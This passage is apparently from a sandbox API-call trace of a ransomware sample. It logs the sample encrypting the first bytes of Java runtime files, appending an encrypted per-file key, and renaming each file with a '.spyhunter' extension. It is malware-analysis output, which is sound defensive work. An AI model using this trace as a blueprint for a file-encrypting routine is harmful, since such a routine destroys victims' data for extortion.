lpNumberOfBytesRead=0x57f7d4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f7d4*=0x2800, lpOverlapped=0x0) returned 1 [0125.088] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.088] WriteFile (in: hFile=0x170, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f7d4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f7d4*=0x2800, lpOverlapped=0x0) returned 1 [0125.088] GetProcessHeap () returned 0x2c0000 [0125.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0125.088] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.088] WriteFile (in: hFile=0x170, lpBuffer=0x57f814*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f7d4, lpOverlapped=0x0 | out: lpBuffer=0x57f814*, lpNumberOfBytesWritten=0x57f7d4*=0x4, lpOverlapped=0x0) returned 1 [0125.236] WriteFile (in: hFile=0x170, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f7d4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f7d4*=0x30, lpOverlapped=0x0) returned 1 [0125.236] CloseHandle (hObject=0x170) returned 1 [0125.247] GetProcessHeap () returned 0x2c0000 [0125.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0125.247] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\javaws.jar.spyhunter") returned 61 [0125.247] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\javaws.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\javaws.jar"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\javaws.jar.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\javaws.jar.spyhunter")) returned 1 [0125.248] GetProcessHeap () returned 0x2c0000 [0125.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0125.248] GetProcessHeap () returned 0x2c0000 [0125.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0125.248] GetProcessHeap () returned 0x2c0000 [0125.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c22070 | out: hHeap=0x2c0000) returned 1 [0125.249] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f818 | out: pbBuffer=0x57f818) returned 1 [0125.249] GetProcessHeap () returned 0x2c0000 [0125.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0125.249] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f810*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f810*=0x30) returned 1 [0125.249] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jfr.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.250] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr.jar") returned 48 [0125.250] StrStrW (lpFirst="jfr.jar", lpSrch=".txt") returned 0x0 [0125.250] GetProcessHeap () returned 0x2c0000 [0125.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0125.250] ReadFile (in: hFile=0x170, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f7d4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f7d4*=0x2800, lpOverlapped=0x0) returned 1 [0125.252] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.252] WriteFile (in: hFile=0x170, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f7d4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f7d4*=0x2800, lpOverlapped=0x0) returned 1 [0125.252] GetProcessHeap () returned 0x2c0000 [0125.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0125.252] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.253] WriteFile (in: hFile=0x170, lpBuffer=0x57f814*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f7d4, lpOverlapped=0x0 | out: lpBuffer=0x57f814*, lpNumberOfBytesWritten=0x57f7d4*=0x4, lpOverlapped=0x0) returned 1 [0125.282] WriteFile (in: hFile=0x170, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f7d4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f7d4*=0x30, lpOverlapped=0x0) returned 1 [0125.282] CloseHandle (hObject=0x170) returned 1 [0125.282] GetProcessHeap () returned 0x2c0000 [0125.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0125.282] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr.jar.spyhunter") returned 58 [0125.282] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jfr.jar"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr.jar.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jfr.jar.spyhunter")) returned 1 [0125.282] GetProcessHeap () returned 0x2c0000 [0125.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0125.283] GetProcessHeap () returned 0x2c0000 [0125.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0125.283] GetProcessHeap () returned 0x2c0000 [0125.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21db0 | out: hHeap=0x2c0000) returned 1 [0125.283] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f810 | out: pbBuffer=0x57f810) returned 1 [0125.283] GetProcessHeap () returned 0x2c0000 [0125.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0125.283] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f808*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f808*=0x30) returned 1 [0125.283] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\javafx.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\javafx.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.284] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\javafx.properties") returned 58 [0125.284] StrStrW (lpFirst="javafx.properties", lpSrch=".txt") returned 0x0 [0125.284] GetProcessHeap () returned 0x2c0000 [0125.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0125.284] ReadFile (in: hFile=0x170, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f7cc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f7cc*=0x1d, lpOverlapped=0x0) returned 1 [0125.285] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffffe3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.285] WriteFile (in: hFile=0x170, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x57f7cc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f7cc*=0x1d, lpOverlapped=0x0) returned 1 [0125.285] GetProcessHeap () returned 0x2c0000 [0125.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0125.285] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.285] WriteFile (in: hFile=0x170, lpBuffer=0x57f80c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f7cc, lpOverlapped=0x0 | out: lpBuffer=0x57f80c*, lpNumberOfBytesWritten=0x57f7cc*=0x4, lpOverlapped=0x0) returned 1 [0125.285] WriteFile (in: hFile=0x170, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f7cc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f7cc*=0x30, lpOverlapped=0x0) returned 1 [0125.285] CloseHandle (hObject=0x170) returned 1 [0125.285] GetProcessHeap () returned 0x2c0000 [0125.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0125.285] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\javafx.properties.spyhunter") returned 68 [0125.285] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\javafx.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\javafx.properties"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\javafx.properties.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\javafx.properties.spyhunter")) returned 1 [0125.286] GetProcessHeap () returned 0x2c0000 [0125.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0125.286] GetProcessHeap () returned 0x2c0000 [0125.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0125.286] GetProcessHeap () returned 0x2c0000 [0125.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5fac0 | out: hHeap=0x2c0000) returned 1 [0125.288] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f808 | out: pbBuffer=0x57f808) returned 1 [0125.289] GetProcessHeap () returned 0x2c0000 [0125.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0125.289] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f800*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f800*=0x30) returned 1 [0125.289] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_movenodrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.290] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 81 [0125.290] StrStrW (lpFirst="win32_MoveNoDrop32x32.gif", lpSrch=".txt") returned 0x0 [0125.290] GetProcessHeap () returned 0x2c0000 [0125.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0125.290] ReadFile (in: hFile=0x170, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f7c4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f7c4*=0x99, lpOverlapped=0x0) returned 1 [0125.290] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffff67, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.290] WriteFile (in: hFile=0x170, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x99, lpNumberOfBytesWritten=0x57f7c4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f7c4*=0x99, lpOverlapped=0x0) returned 1 [0125.291] GetProcessHeap () returned 0x2c0000 [0125.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0125.291] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.291] WriteFile (in: hFile=0x170, lpBuffer=0x57f804*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f7c4, lpOverlapped=0x0 | out: lpBuffer=0x57f804*, lpNumberOfBytesWritten=0x57f7c4*=0x4, lpOverlapped=0x0) returned 1 [0125.291] WriteFile (in: hFile=0x170, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f7c4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f7c4*=0x30, lpOverlapped=0x0) returned 1 [0125.291] CloseHandle (hObject=0x170) returned 1 [0125.291] GetProcessHeap () returned 0x2c0000 [0125.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0125.291] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif.spyhunter") returned 91 [0125.291] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_movenodrop32x32.gif"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_movenodrop32x32.gif.spyhunter")) returned 1 [0125.292] GetProcessHeap () returned 0x2c0000 [0125.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0125.292] GetProcessHeap () returned 0x2c0000 [0125.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0125.292] GetProcessHeap () returned 0x2c0000 [0125.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ece920 | out: hHeap=0x2c0000) returned 1 [0125.292] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f800 | out: pbBuffer=0x57f800) returned 1 [0125.292] GetProcessHeap () returned 0x2c0000 [0125.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0125.292] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f7f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f7f8*=0x30) returned 1 [0125.292] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_MoveDrop32x32.gif" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_movedrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.293] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 79 [0125.293] StrStrW (lpFirst="win32_MoveDrop32x32.gif", lpSrch=".txt") returned 0x0 [0125.293] GetProcessHeap () returned 0x2c0000 [0125.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0125.293] ReadFile (in: hFile=0x170, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f7bc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f7bc*=0x93, lpOverlapped=0x0) returned 1 [0125.294] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffff6d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.294] WriteFile (in: hFile=0x170, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x93, lpNumberOfBytesWritten=0x57f7bc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f7bc*=0x93, lpOverlapped=0x0) returned 1 [0125.294] GetProcessHeap () returned 0x2c0000 [0125.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0125.294] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.294] WriteFile (in: hFile=0x170, lpBuffer=0x57f7fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f7bc, lpOverlapped=0x0 | out: lpBuffer=0x57f7fc*, lpNumberOfBytesWritten=0x57f7bc*=0x4, lpOverlapped=0x0) returned 1 [0125.294] WriteFile (in: hFile=0x170, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f7bc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f7bc*=0x30, lpOverlapped=0x0) returned 1 [0125.295] CloseHandle (hObject=0x170) returned 1 [0125.295] GetProcessHeap () returned 0x2c0000 [0125.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0125.295] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_MoveDrop32x32.gif.spyhunter") returned 89 [0125.295] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_MoveDrop32x32.gif" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_movedrop32x32.gif"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_MoveDrop32x32.gif.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_movedrop32x32.gif.spyhunter")) returned 1 [0125.295] GetProcessHeap () returned 0x2c0000 [0125.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0125.295] GetProcessHeap () returned 0x2c0000 [0125.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0125.295] GetProcessHeap () returned 0x2c0000 [0125.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eea728 | out: hHeap=0x2c0000) returned 1 [0125.296] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f800 | out: pbBuffer=0x57f800) returned 1 [0125.296] GetProcessHeap () returned 0x2c0000 [0125.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0125.296] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f7f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f7f8*=0x30) returned 1 [0125.296] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_linknodrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.296] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 81 [0125.296] StrStrW (lpFirst="win32_LinkNoDrop32x32.gif", lpSrch=".txt") returned 0x0 [0125.296] GetProcessHeap () returned 0x2c0000 [0125.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0125.296] ReadFile (in: hFile=0x170, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f7bc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f7bc*=0x99, lpOverlapped=0x0) returned 1 [0125.297] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffff67, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.297] WriteFile (in: hFile=0x170, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x99, lpNumberOfBytesWritten=0x57f7bc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f7bc*=0x99, lpOverlapped=0x0) returned 1 [0125.297] GetProcessHeap () returned 0x2c0000 [0125.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0125.297] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.297] WriteFile (in: hFile=0x170, lpBuffer=0x57f7fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f7bc, lpOverlapped=0x0 | out: lpBuffer=0x57f7fc*, lpNumberOfBytesWritten=0x57f7bc*=0x4, lpOverlapped=0x0) returned 1 [0125.297] WriteFile (in: hFile=0x170, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f7bc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f7bc*=0x30, lpOverlapped=0x0) returned 1 [0125.298] CloseHandle (hObject=0x170) returned 1 [0125.298] GetProcessHeap () returned 0x2c0000 [0125.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0125.298] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif.spyhunter") returned 91 [0125.298] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_linknodrop32x32.gif"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_linknodrop32x32.gif.spyhunter")) returned 1 [0125.298] GetProcessHeap () returned 0x2c0000 [0125.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0125.298] GetProcessHeap () returned 0x2c0000 [0125.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0125.299] GetProcessHeap () returned 0x2c0000 [0125.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ece830 | out: hHeap=0x2c0000) returned 1 [0125.299] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f7f8 | out: pbBuffer=0x57f7f8) returned 1 [0125.299] GetProcessHeap () returned 0x2c0000 [0125.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0125.299] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f7f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f7f0*=0x30) returned 1 [0125.299] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_LinkDrop32x32.gif" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_linkdrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.300] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_LinkDrop32x32.gif") returned 79 [0125.300] StrStrW (lpFirst="win32_LinkDrop32x32.gif", lpSrch=".txt") returned 0x0 [0125.300] GetProcessHeap () returned 0x2c0000 [0125.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0125.300] ReadFile (in: hFile=0x170, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f7b4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f7b4*=0xa8, lpOverlapped=0x0) returned 1 [0125.300] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffff58, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.301] WriteFile (in: hFile=0x170, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xa8, lpNumberOfBytesWritten=0x57f7b4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f7b4*=0xa8, lpOverlapped=0x0) returned 1 [0125.301] GetProcessHeap () returned 0x2c0000 [0125.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0125.301] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.301] WriteFile (in: hFile=0x170, lpBuffer=0x57f7f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f7b4, lpOverlapped=0x0 | out: lpBuffer=0x57f7f4*, lpNumberOfBytesWritten=0x57f7b4*=0x4, lpOverlapped=0x0) returned 1 [0125.301] WriteFile (in: hFile=0x170, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f7b4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f7b4*=0x30, lpOverlapped=0x0) returned 1 [0125.301] CloseHandle (hObject=0x170) returned 1 [0125.301] GetProcessHeap () returned 0x2c0000 [0125.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0125.301] wnsprintfW (in: pszDest=0x2ef5c20, 